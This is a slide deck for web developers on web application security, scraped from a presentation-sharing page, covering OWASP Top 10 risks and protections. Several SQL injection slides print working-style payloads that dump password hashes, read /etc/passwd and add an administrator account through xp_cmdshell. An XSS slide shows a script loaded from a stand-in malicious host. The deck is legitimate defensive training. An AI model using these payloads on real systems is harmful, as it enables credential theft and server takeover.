Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Web Application Security Session for Web Developers

502 vues

Publié le

Web Application Security session conducted by Lightracers Consulting for web developers. In this learning presentation, we will look at - What is Cyber Crime, Types of Cyber crime, What is Cyber Security, Types of Threats, Overview of OWASP, OWASP Top 10 Vulnerabilities (SQL Injection, Cross Site Scripting, Cross Site Request Forgery, Security Misconfiguration, Sensitive Data exposure, etc.) and Protection measures.

Publié dans : Internet
  • Login to see the comments

Web Application Security Session for Web Developers

  1. 1. WebApplication Security For Web Developers
  2. 2. Learning Agenda • Cyber Crime & Security • Web Architecture • OWASPTop 10Vulnerabilities • Protection
  3. 3. Information,Technology & Society • The Information is the data that is of interest • The Technology used to create, communicate, distribute, manipulate, store or destroy information • The technology is any mechanism capable of data processing • The Society is a group of people involved in social interaction • Becoming socialized means learning what kind(s) of behavior is appropriate in given situation • Society and IT and co-evolving and impact each other
  4. 4. Trends in Digitization • Storing social and intellectual interactions • Gathering and synthesizing information that was disconnected • Higher expectations from technology than people
  5. 5. Cyber Crime • Cyber crimes can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code/US Federal Law • The abuse of computers has also given birth to a gamut of new age crimes that are addressed by Laws
  6. 6. Types of Cyber Crime • Hacking (illegal intrusion into a system/network) • Denial of Service attack • Virus dissemination • CyberTerrorism • Software piracy
  7. 7. Purpose of Cyber Crime • Financial Fraud • Damage to data/system/network • Theft of proprietary information • System penetration • Denial of Service • Unauthorized access • Abuse of privileges • Spreading viruses
  8. 8. What is Cyber Security? • Cybersecurity is a subset of information security; the practice of defending data/information (electronic or physical) from unauthorized access, use, disclosure, disruption, modification, perusal, inspection, recording or destruction • Shared responsibility between merchants and users • Cyber security involves protecting that information by preventing, detecting, and responding to attacks. Source: https://en.wikipedia.org/wiki/Information_security
  9. 9. What is Cyber Security? • Cyber Security are the processes employed to safeguard and secure assets used to carry information of an organization from being stolen or attacked. • It requires extensive knowledge of the possible threats such asVirus or such other malicious objects. • Identity management, risk management and incident management form the crux of cyber security strategies of an organization.
  10. 10. Goals of Cyber Security • Confidentiality • Making sure that we keep our data and our information private from those who do not “need to know” • Integrity • Making sure that our data is not tampered with, so that any information we send or receive is accurate and truthful • Availability • Making sure that we, our clients and anyone else who needs to get to our data is able to easily and securely access it
  11. 11. Why Cyber SecurityTraining? • Business Continuity &Trust factor • Protection of data and systems • Prevention of unauthorized access • Safeguarding Personally Identifiable Information • Reduces security related risks upto 75%
  12. 12. Map
  13. 13. Popular Hacks • Burger KingTwitter account (2013) • Twitter defaced by Iranian CyberArmy (2009) • ESPN site decorated with cute unicorns (2009) • Sony pictures data breach(2011), sql injection compromised passwords • EBay data breach (2014) • Many site defacements
  14. 14. Cost of a Breach
  15. 15. Sources of Attacks • Virus /Worms / *-wares (Executables) • Social Engineering (Phishing) • Hackers who are very patient • PEOPLE !!
  16. 16. Why web application security? • 75% of attacks target Application layer through internet (Gartner) • 95% of web applications have some sort of vulnerability (Imperva) • 78% of easily exploitable weakness occur in web applications(Symantec) • 67% of websites, used to distribute malware, are legitimate, compromised websites (Symantec)
  17. 17. Revision of web architecture • Setup • Firewall • Load balancer • Webserver (Reverse Proxy) • Application (.NET, Java, PHP, Perl) • Database (SQL Server, Oracle, MySQL)
  18. 18. Revision of web architecture • Development • Model • View • Controller • Application Anatomy • HTML and JavaScript • CRUD Operations • External/internal libraries/components
  19. 19. Revision of web architecture • Request Methods • GET, POST, HEAD, PUT,TRACE, OPTIONS, DELETE • HTTP & HTTPS • FTP, SFTP • SSH
  20. 20. WAPT • Web Application PenetrationTesting • Evaluate computer/server and network security • Identify flaws and vulnerabilities • Design or implementation flaw • Attack possibility • SQL Injection, CSRF, XSS, File inclusion, User enumeration • Uses negative test data
  21. 21. OpenWeb Application Security Project • Non profit organization and Open Community • Purpose: Be the thriving global community that drives visibility and evolution in the safety and security of the world’s software. • Website - https://www.owasp.org
  22. 22. OWASP Projects • Enterprise Security API (ESAPI) • Collection of all the security methods that a developer needs to build a secure web application • Zed Attack Proxy (ZAP) • Easy to use integrated penetration testing tool for finding vulnerabilities in web applications • Security Shepherd • CBT application for web and mobile application security awareness and education • Development Guide • Massive document covering all aspects of web application and web service security
  23. 23. OWASP 2013Top 10 List • A1-Injection • A2-BrokenAuthentication and Session Management • A3-Cross-Site Scripting (XSS) • A4-Insecure Direct Object References • A5-Security Misconfiguration • A6-Sensitive Data Exposure • A7-Missing Function LevelAccess Control • A8-Cross-Site Request Forgery (CSRF) • A9-Using Components with KnownVulnerabilities • A10-Unvalidated Redirects and Forwards • (Additional) A6/2007: Information Leakage and improper Error handling https://www.owasp.org/index.php/Top_10_2013-Top_10
  24. 24. CWE/SANSTop 25 Rank Name [1] Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') [2] Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') [3] Buffer Copy without Checking Size of Input ('Classic Buffer Overflow') [4] Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') [5] Missing Authentication for Critical Function [6] Missing Authorization [7] Use of Hard-coded Credentials [8] Missing Encryption of Sensitive Data [9] Unrestricted Upload of File with Dangerous Type [10] Reliance on Untrusted Inputs in a Security Decision [11] Execution with Unnecessary Privileges [12] Cross-Site Request Forgery (CSRF)
  25. 25. CWE/SANSTop 25 Rank Name [13] Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') [14] Download of Code Without Integrity Check [15] Incorrect Authorization [16] Inclusion of Functionality from Untrusted Control Sphere [17] Incorrect Permission Assignment for Critical Resource [18] Use of Potentially Dangerous Function [19] Use of a Broken or Risky Cryptographic Algorithm [20] Incorrect Calculation of Buffer Size [21] Improper Restriction of Excessive Authentication Attempts [22] URL Redirection to Untrusted Site ('Open Redirect') [23] Uncontrolled Format String [24] Integer Overflow or Wraparound [25] Use of a One-Way Hash without a Salt
  26. 26. Primary Protection • 4 basic rules for all visible pages • Authentication • Authorization • Validation • Sanitization • Common approach with exception handling • Disable or limit detailed error messages • Ensure that secure paths return similar or identical error messages • Create a default error handler which sanitizes error messages • IDS and IPS • Don’t be lazy to check "ALL” !!
  27. 27. Example: Failed login message • Compare this message • Notice: Username does not exist • Notice: Password was not correct • With this • Notice: Invalid credentials
  28. 28. A1: SQL Injection attack • Use special characters to check • Quotes, double quotes, slashes, dashes, HTML tags • Modern attack techniques are automated • Blind condition SQLi • Information gathering • Error based analysis • Output mechanism • Understanding the query • Determine the database type • Find out user access level • Determine the OS
  29. 29. A1: SQL Injection attack
  30. 30. A1: SQL Injection attack
  31. 31. A1: SQL Injection attack • Finding user privilege level • ‘ and 1 in (select user) –- • ‘; if user =‘dbo’ wait for delay ‘0:0:5’ – • ‘ union select if( user() like ‘root@%’ • Default admin accounts • sa, system, sys, dba, admin, root and many others
  32. 32. A1: SQL Injection attack • All tables and columns in one query • ‘ union select 0, sysobjects.name + ‘:’ +syscolumns.name + ‘: ‘ + systypes,name, 1, 1,‘1’. 1, 1, 1, 1, 1 from sysobjects, syscolumns,systypes where sysobjects.xtype = ‘U’ ANDsysobjects.id = syscolumns,idANDSyscolumns.xtype = systypes.xtype – • File location of databases • ‘ and 1 in (select min(filename) from master.dbo.sysdatabases where filename >’.’) –- • Getting user names and passwords • ‘; begin declare @var varchar(8000) set @var=‘:’ select @var=@var+’ ’+login+’/’+password+’ ‘ from users where login>@var select @var as var into temp end --
  33. 33. A1: SQL Injection attack • The hashes are extracted using • SELECT password FROM master..sysxlogins • Then hex each hash • Begin @charvalue=‘0x’, @i=1, @length=datalength(@binvalue), @hexstring = ‘0123456789ABCDEF’ While (@i<=@lenght) BEGIN declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int,SUBSTRING(@binvalue,@i1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint – (@firstint*16) select @charvalue=@charvalue + SUBSTRING (@hexstring,@firstint+1,1) + SUBSTRING (@hexstring, @secondint+1, 1) Select @i=@i+1 END • And then we just cycle through all passwords
  34. 34. A1: SQL Injection attack ‘; begin declare @ var varchar(8000), @xdate1 datetime, @binvalue varbinary(255), @charvalue varchar(255), @ int, @length int, @hexstring char(16) set @var=‘:’ select @xdate1=(select min(xdate1) from master.dbo.syslogins where password is not null) begin while @xdate1 <= (select max (xdate1) from master.dbo.sysxlogins where password is not null) begin select @binvalue=(select password from master.dbo.sysxlogins where Xdate1=@xdate1), @charvalue = ‘0x’, @i=1 @length=datalength( @binvalue), @hextring =‘0123456789ABCDEF’ while (@i<=@length) begin declare @tempint int, @firstint int, @secondint int select @tempint=CONVERT(int, SUBSTRING( @binvalue,@i,1)) select @firstint=FLOOR(@tempint/16) select @secondint=@tempint - ( @firstint*16) select @charvalue=@charvalue + SUBSTRING ( @hextring,@firstint+1,1) + SUBSTRING ( @hexstring, @secondint+1,1) select @i=@i+1 end select @var=@var+’/ ‘+name+’/’+@charvalue from master.dbo.sysxlogins where xdate1=@xdate1 select @xdate1 = (select isnull(min(xdate1),getdate()) from master..sysxlogins where xdate1>@sdate1 and password is not null) end select @var as x into temp end end --
  35. 35. A1: SQL Injection attack • Brute forcing passwords • create table tempdb..passwords( pwd varchar(255) ) • bulk insert tempdb..passwords from ‘c:/temp/passwords.txt’ • select name, pwd from tempdb..passwords inner join sysxlogins on (pwdcompare( pwd, sysxlogins.password, 0 ) = 1) union select name, name from sysxlogins where (pwdcompare(name, sysxlogins.password, 0 ) = 1) union select sysxlogins,name, null from sysxlogins join syslogins on sysxlogins.sid= where sysxlogins.password is null and syslogins.isntgroup=0and syslogins.isntuser=0 • drop table tempdb..passwords
  36. 36. A1: SQL Injection attack • Uploading files (lengthy sql query) • ‘declare @hex varchar(8000), bin varchar(8000) select @hex = ‘4d5a900003000... 8000 hex chars ...0000000000000000000’ exec master..sp_hex2bin @hex, @bin output ; insert master..pwdump2 select @bin -- • Inject binary as hex in 4000 byte chunks
  37. 37. A1: SQL Injection attack • MySQL OS Interaction • LOAD_FILE ‘union select 1,load_file(‘/etc/passwd’),1,1,1; • LOAD DATA INFILE create table temp( line blob); load date infile ‘/passwd’ into table temp; select * from temp; • SELECT INTO OUTFILE • Server name and configuration • ‘ and 1 in (select @@servername ) – • ‘and 1 in (select srvname from master..sysservers )
  38. 38. A1: SQL Injection attack • Linux OS based MySQL • ‘ union select 1, (load_file(‘/etc/passwd’)),1,1,1; • MS SQLWindows Password Creation • ‘ exec xp_cmdshell ‘net user /add victor Pass123’— ‘;exec xp_cmdshell ‘net localgroup /add administrators victor’ – • Stopping OS Services • ‘; exec master..xp_servicecontrol ‘ start’, FTP Publishing’ --
  39. 39. A1: SQL Injection - Protection • Escape special characters • Validate input data types • Avoid plain string concatenation • Use prepared statements • Enforce least privileges for application's database user • PerformWhitelist input validation on all input • Allow only the data that is of expected length
  40. 40. A2: Broken Authentication • Exposure of SESSION ID • Considering SESSION ID's data acceptable • Pages without authorization checks • Not confirming user actions • Not HTTPS? Beware !!
  41. 41. A2: Broken Authentication - Protection • Centralized & standardized authentication • Use standard session ID of your container • Protect credentials and Session ID with SSL/TLS • Keep your SSL certificate safe • Automatically logout inactive sessions • Use supplemental authentications (OTP, Captchas, etc) • Expire/remind old passwords and have strong password policy https://howsecureismypassword.net/
  42. 42. A3: Cross Site Scripting (XSS) • Code in text field • "Every" web application has this problem • By-passed client side validations • Two types • Reflected XSS • Stored XSS
  43. 43. A3: Cross Site Scripting (XSS) • Query: • http://vulnerable.com/search/my+search • Result: ...<body> <p>Search results for <strong>my search</strong></p> ... • Query: • http://vulnerable.com/search/<script src=http://malicious.com/script.js></script> • Result: ... <p>Search results from <strong><script src=http://malicious.com/script.js></script></p> ...
  44. 44. A3: Cross Site Scripting (XSS) • If an attacker submits a comment • <script>alert(‘HelloVictim!’);</script> • The result may look like • <div class=comments> <div>This post is awesome!</div> <div><script>alert(‘HelloVictim!’);</script></div> • Embedded binaries are possible • data:’text/html;base64,PHNjcmlwdD5hbGVydCgiS· GkgdGhlcmUgOlAiKTs8L3NjcmlwdD4=
  45. 45. A3: Cross Site Scripting (XSS) - Protection • Don’t include input in your output “as it is” • Perform whitelist input validation • Escape special characters • Use Sanitizer (consider OWASP HTML Sanitizer)
  46. 46. A4: Insecure Direct Object Reference • Failure to restrict URL access • Hiding object references in hidden fields • Giving access control to presentation layer • Exposing unauthorized files/data • E.g. https://accounts.mycompany.com/download?file=payslips/payslip_112233.pdf
  47. 47. A4: Insecure Direct Object Reference - Protection • Verify parameter value format • Eliminate Direct Object references • Use Access reference maps • E.g. https://accounts.mycompany.com/download?file=K62a8129 • Verify user authorization to access target object • Verify requested mode on the target object (read, write, delete, etc)
  48. 48. A5: Security Misconfiguration • Is your source code really secret? • Is your database access restricted? • Is your server hardened?
  49. 49. A5: Security Misconfiguration • Missing OS/Server patches • Flaws in non- upgraded application patches • Unauthorized access to functionality/data • Insider threat
  50. 50. A5: Security Misconfiguration - Protection • Verify systems’ configuration management • "Hardening" is done? • Update/upgrade dependent software libraries • Deactivate unnecessary ports, services, accounts, sites, etc. • Scan regularly
  51. 51. A6: Sensitive Data Exposure • Failure to identify source and destination of sensitive data • Attackers extract secrets to use in additional attacks • Impact on cleaning up the incident • Storing plain passwords in code • Usage of weak algorithms : MD5, SHA-1, RC3, RC4
  52. 52. A6: Sensitive Data Exposure - Protection • Identify all sensitive data and their locations • Use AES, RSA, SHA-256 • Generate, distribute and protect keys and change them often • Verify your implementation !! • Be careful with unknown networks: Hotspots, FreeWIFI zones, Internet cafes, etc.
  53. 53. A7: Missing Function level action control • Attackers invoke actions they are not authorized for • Performing privileged actions
  54. 54. A7: Missing Function level action control - Protection • Restrict access to authenticated users • Enforce user or role based permissions • Disallow requests to unauthorized page types: config, log, source files, etc.
  55. 55. A8: Cross Site Request Forgery • Tricking browser to load vulnerable URL • Browsers include authentication data in each request • Impact: Access sensitive data and change account details • Sites relying only on credentials are vulnerable • XSS plays well with CSRF
  56. 56. A8: Cross Site Request Forgery - Protection • Use CSRFTokens • Store token in session and validate the posted token • Implement XSS protection
  57. 57. A9: Using known vulnerable components • Attackers identify weak component and customize attack • Libraries/framework components which are not trusted
  58. 58. A9: Using known vulnerable components - Protection • Identify components, versions and dependencies • Monitor the activity of these components • Update them regularly • Restrict use of unapproved components
  59. 59. A10: Unvalidated redirects and forwards • Common usage of URL redirects attaching input data • Forwarding with parameters skipping authentication
  60. 60. A10: Unvalidated redirects and forwards - Protection • Avoid using redirects • Don’t involve user parameters to define target URL • Whitelist parameter types and destination URLs • Verify access of the user before forwarding • Check user access on all pages
  61. 61. Secure Software Development Lifecycle • Consider security aspects when designing solution • Understand common vulnerabilities • Write clean code • Perform code security scans & code reviews • Never trust any user input !! • Perform penetration test
  62. 62. OWASP Zed Attack Proxy • Open source blackbox security scanner • Free and Easy to use • Ideal for beginners and professionals • Cross platform (Java) • Intended for developers
  63. 63. ZAP features • Intercepting proxy • Active and Passive scanners • Spiders (for HTML and Ajax) • Report generation • Brute force • Session Awareness • API (clients exist for Java, Python, Node.js, PHP)
  64. 64. WAPT Softwares • Web proxy • BURP • Paros • Webscarab • Fuzzing • WS Fuzzer • Scanners • W3AF • Zap
  65. 65. Best Practices • Embed security measures while coding • Filter and sanitize input data • Encrypt sensitive files • Report any potential breach • Never let someone have access to your system with your credentials • Always logoff or lock your system if you leave (even for a minute)
  66. 66. Conclusion • Web applications are always under attack • Protect your company information, assets & your information • New threats will emerge with technology advancements • Get Informed & Get Involved • Trust your instincts: If something feels wrong, it is. Report the issues and ask for help if necessary • Be an advocate for security … speak up!
  67. 67. Glossary • Access Point • Asset • Adware • Algorithm • Attack • Availability • Authentication • Authorization • Backdoor • Botnet • Brute force Attack • Cryptography • Cyberwar • Compliance • Data Leakage • DoS, DDoS • Digital Certificate • Encyption • Evidence • Exploit • Firewall • Forensics • Freeware • Governance • Hardening • Hijack • HTTP/HTTPS • Identity • Incident • Intrusion (IDS&IPS) • MAC address
  68. 68. Glossary • Password • Penetration • Phishing • Port • Protocol • Proxy Server • Reverse Engineering • Routers • Scan • Security Plan • Signature • Spam • Spoof • Script Injection • Tamper • Threat • Trojan Horse • User • URI & URL • Virus • Virtual Private Network • Web Server • Zero-dayAttack • Zombie Computer

×